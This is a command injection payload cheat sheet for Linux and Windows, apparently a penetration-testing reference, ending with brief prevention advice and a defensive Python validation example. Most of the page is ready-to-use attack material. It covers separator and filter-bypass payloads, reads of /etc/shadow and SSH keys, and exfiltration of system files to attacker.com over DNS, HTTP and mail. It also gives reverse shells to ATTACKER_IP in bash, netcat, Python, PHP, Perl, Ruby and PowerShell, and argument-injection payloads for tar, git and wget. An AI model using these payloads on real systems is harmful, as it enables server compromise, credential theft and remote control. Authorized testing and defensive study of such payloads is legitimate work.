Command Injection Payloads
Command Injection (also known as OS Command Injection or Shell Injection) is a vulnerability that allows an attacker to execute arbitrary operating system commands on the server hosting an application. This can lead to full system compromise, data theft, and unauthorized access.
Command Separators
Linux/Unix
; # Executes commands sequentially
& # Runs command in background
&& # Executes if previous command succeeds
| # Pipes output to next command
|| # Executes if previous command fails
\n # Newline (0x0a)
` # Command substitution (backticks)
$() # Command substitution
Windows
& # Executes commands sequentially
&& # Executes if previous command succeeds
| # Pipes output to next command
|| # Executes if previous command fails
%0a # Newline
Basic Payloads
Linux/Unix
; whoami
& whoami
&& whoami
| whoami
|| whoami
; id
; cat /etc/passwd
; ls -la
; pwd
; uname -a
; hostname
`whoami`
$(whoami)
;`whoami`
;$(whoami)
&& whoami &
& whoami &
Windows
& whoami
&& whoami
| whoami
|| whoami
& ver
& dir
& ipconfig
& hostname
& net user
& systeminfo
Multiline Execution
%0awhoami
%0aid
\nwhoami
\nid
# Backslash newline
cat /et\
c/pa\
sswd
Blind Command Injection
Used when the command's output is not returned in the application's response; success is inferred from side effects such as a time delay or an out-of-band network request.
Time Delays
Linux:
; sleep 5
& sleep 10
&& sleep 5 &
| sleep 5
|| sleep 5
; ping -c 10 127.0.0.1
Windows:
& timeout /t 5
&& ping -n 10 127.0.0.1
| timeout 5
Out-of-Band Detection
DNS Exfiltration:
; nslookup attacker.com
; dig attacker.com
; host attacker.com
; ping -c 1 attacker.com
# With data exfiltration
; nslookup `whoami`.attacker.com
; dig $(whoami).attacker.com
HTTP Requests:
; curl http://attacker.com
; wget http://attacker.com
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/?data=$(cat /etc/passwd | base64)
Writing to Web-Accessible Files
; whoami > /var/www/html/output.txt
; id > /tmp/output.txt
; cat /etc/passwd > /var/www/html/data.txt
Bypass Techniques
Bypass Without Spaces
# Using $IFS (Internal Field Separator)
;cat$IFS/etc/passwd
;cat${IFS}/etc/passwd
;cat$IFS$9/etc/passwd
# Using tabs
;cat%09/etc/passwd
# Using brace expansion
;{cat,/etc/passwd}
# Using input redirection
;cat</etc/passwd
;sh</dev/tcp/attacker.com/4444
# Using $()
;cat$(echo$IFS)/etc/passwd
Quote Manipulation
# Single quotes
;w'h'o'am'i
;c'a't' '/e't'c'/p'a's's'w'd
# Double quotes
;w"h"o"am"i
;c"a"t" "/e"t"c"/p"a"s"s"w"d
# Mixed quotes
;who'am'i
;c'at' /etc/pass'wd
Backslash Obfuscation
;w\ho\am\i
;c\at \/etc\/pass\wd
;/\b\i\n/////s\h
Variable Expansion
;cat ${test//hhhhm/}
;cat $HOME$NO_VAR/../../etc/passwd
;who$@ami
;who$()ami
Wildcards
;/???/??t /???/?asswd
;/???/c?t /???/p??s??
;cat /e*c/p*wd
Hex/Octal Encoding
# Hex
;cat \x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
;\x63\x61\x74 /etc/passwd
# Octal
;cat \057\145\164\143\057\160\141\163\163\167\144
Base64 Encoding
# Encode the command first: "whoami" in base64 is d2hvYW1p
;echo d2hvYW1p | base64 -d | sh
;bash<<<$(base64 -d<<<d2hvYW1p)
;bash<<<$(echo$IFS'whoami'|base64 -d)
Case Manipulation (Windows)
# Commands are case-insensitive on Windows
& WhoAmI
& WhOaMi
& WHOAMI
Comment Breaking
;w#ho#am#i
;cat /e'#'tc/pa'#'sswd
Tilde Expansion
;cat ~+/../etc/passwd
;cat ~-/../etc/passwd
Data Exfiltration
File Reading
; cat /etc/passwd
; cat /etc/shadow
; cat ~/.bash_history
; cat ~/.ssh/id_rsa
; cat /var/www/html/config.php
; cat /proc/self/environ
Sending Data via DNS
; nslookup `cat /etc/passwd | base64`.attacker.com
; dig $(cat /etc/hostname).attacker.com
Sending Data via HTTP
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/?data=$(cat /etc/passwd | base64)
; curl -X POST -d "data=$(cat /etc/passwd)" http://attacker.com
Email Exfiltration
; cat /etc/passwd | mail -s "Data" attacker@example.com
Reverse Shells
Bash Reverse Shell
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
; /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/4444; sh <&196 >&196 2>&196
Netcat Reverse Shell
; nc ATTACKER_IP 4444 -e /bin/sh
; nc ATTACKER_IP 4444 -e /bin/bash
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
Python Reverse Shell
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse Shell
; php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl Reverse Shell
; perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PowerShell Reverse Shell (Windows)
& powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Platform-Specific Payloads
Linux-Specific
# System Information
; cat /etc/os-release
; cat /proc/version
; cat /proc/cpuinfo
; cat /proc/meminfo
# User Enumeration
; cat /etc/passwd
; cat /etc/shadow
; cat /etc/group
; id
; whoami
; w
; last
# Network Information
; ifconfig
; ip addr
; netstat -antup
; ss -tuln
; iptables -L
# File System
; find / -name "*.conf" 2>/dev/null
; find / -perm -4000 2>/dev/null
; find / -writable -type f 2>/dev/null
# Process Information
; ps aux
; top -n 1
; pstree
Windows-Specific
# System Information
& systeminfo
& ver
& wmic os get caption
& wmic computersystem get model,name
# User Enumeration
& whoami
& whoami /priv
& net user
& net localgroup administrators
& net user Administrator
# Network Information
& ipconfig /all
& netstat -ano
& arp -a
& route print
# File System
& dir /s /b *.config
& dir /s /b *.txt
& type C:\Windows\System32\drivers\etc\hosts
# Process Information
& tasklist
& wmic process get caption,executablepath,processid
& wmic service list brief
Advanced Techniques
Argument Injection
When the command is fixed but arguments can be controlled:
# For tools like tar, rsync, git, etc. (the --checkpoint options below are GNU tar)
--checkpoint=1
--checkpoint-action=exec=sh exploit.sh
# Git
--upload-pack='bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
# Wget
--post-file=/etc/passwd http://attacker.com
Environment Variable Injection
; export PATH=/tmp:$PATH
; env
; printenv
Polyglot Payloads
';whoami;'
";whoami;"
`whoami`
$(whoami)
${whoami}
Prevention Best Practices
- Avoid OS Commands: Use built-in library functions instead of system calls
- Input Validation: Whitelist allowed characters (alphanumeric only when possible)
- Escape Special Characters: Properly escape shell metacharacters
- Use Safe APIs: Use language-specific safe execution methods
- Principle of Least Privilege: Run applications with minimal permissions
- Logging and Monitoring: Monitor for suspicious command execution patterns
- Sandboxing: Execute commands in isolated environments
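As an added example that is not part of the original cheat sheet, the Python below shows why a blocklist of the separators listed at the top of the page (the usual "escape special characters" fix) still lets the $(...) substitution and the %0a encoded-newline payloads through, and how an allowlist plus a shell-free argv implements the first four recommendations. The hostname pattern, the ping wrapper and the sample inputs are constructed for this example.

```python
import re
import shlex
import subprocess
from typing import List

# Constructed sample inputs: a benign value plus injection forms taken from
# the separator, substitution and encoded-newline sections of the cheat sheet.
BENIGN = "example.com"
SEPARATOR_PAYLOAD = "example.com; whoami"
SUBSTITUTION_PAYLOAD = "example.com$(whoami)"
ENCODED_NEWLINE_PAYLOAD = "example.com%0awhoami"  # decoded to a newline later

# A blocklist of the obvious separators. Many "escape special characters"
# fixes amount to this, and it misses $(...) and anything still URL-encoded.
BLOCKLIST = re.compile(r"[;&|`\n]")

def blocklist_rejects(value: str) -> bool:
    return bool(BLOCKLIST.search(value))

# Allowlist: RFC 1123 hostname labels only; everything else is rejected,
# including '$', '{', '%', whitespace and tabs used by the bypass payloads.
HOSTNAME = re.compile(
    r"(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)

def allowlist_accepts(value: str) -> bool:
    return HOSTNAME.fullmatch(value) is not None

def quote_for_shell(value: str) -> str:
    # Only if a shell is unavoidable: shlex.quote makes the whole value one
    # single-quoted word, so separators inside it are never parsed as syntax.
    return shlex.quote(value)

def build_ping_argv(host: str) -> List[str]:
    """Build argv for ping with no shell involved: the host is one argument,
    so separators in it are data, not syntax. Validation still runs first,
    and '--' ends getopt option parsing so a value cannot become a flag."""
    if not allowlist_accepts(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", "--", host]

def run_ping(host: str) -> int:
    # shell=False (the default): the list goes straight to execve, no /bin/sh.
    return subprocess.run(build_ping_argv(host), check=False).returncode
```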
Testing Tools
- Commix - Automated command injection tool
- Burp Suite - Web application security testing
- OWASP ZAP - Security scanner
- Metasploit - Penetration testing framework
⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.